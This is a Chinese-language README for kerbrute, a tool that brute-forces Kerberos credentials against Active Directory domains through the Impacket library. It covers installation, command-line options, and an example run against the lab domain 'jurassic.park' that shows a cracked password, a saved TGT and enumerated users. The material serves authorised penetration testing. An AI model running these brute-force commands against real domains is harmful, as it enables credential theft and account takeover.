一个通过使用 Impacket 库执行 Kerberos 暴力破解的脚本。
执行时,输入接收一个用户或用户列表以及一个密码或密码列表。然后进行暴力破解攻击以枚举:
结果,脚本会生成发现的凭证列表,以及由这些有效凭证生成的 TGT。
从 pypi:
pip3 install kerbrute
从仓库:
git clone https://github.com/TarlogicSecurity/kerbrute
cd kerbrute
pip install -r requirements.txt
无参数帮助:
root@kali:~# kerbrute
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation
usage: kerbrute.py [-h] [-debug] (-user USER | -users USERS)
[-password PASSWORD | -passwords PASSWORDS] -domain DOMAIN
[-dc-ip <ip_address>] [-threads THREADS]
[-outputfile OUTPUTFILE] [-no-save-ticket]
optional arguments:
-h, --help 显示此帮助信息并退出
-debug 开启 DEBUG 输出
-user USER 要执行暴力破解的用户
-users USERS 每行一个用户的文件
-password PASSWORD 要执行暴力破解的密码
-passwords PASSWORDS 每行一个密码的文件
-domain DOMAIN 要执行暴力破解的域
-dc-ip <ip_address> 域控制器的 IP 地址
-threads THREADS 执行暴力破解的线程数。默认 = 1
-outputfile OUTPUTFILE
保存发现的 user:password 的文件
-no-save-ticket 不保存通过正确凭证获取的 TGT
示例:
./kerbrute.py -users users_file.txt -passwords passwords_file.txt -domain contoso.com
执行示例:
root@kali:~# kerbrute -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation
[*] Stupendous => triceratops:Sh4rpH0rns
[*] 已保存 TGT 到 triceratops.ccache
[*] 有效用户 => velociraptor [未预认证]
[*] 有效用户 => trex
[*] 已保存发现的密码到 jurassic_passwords.txt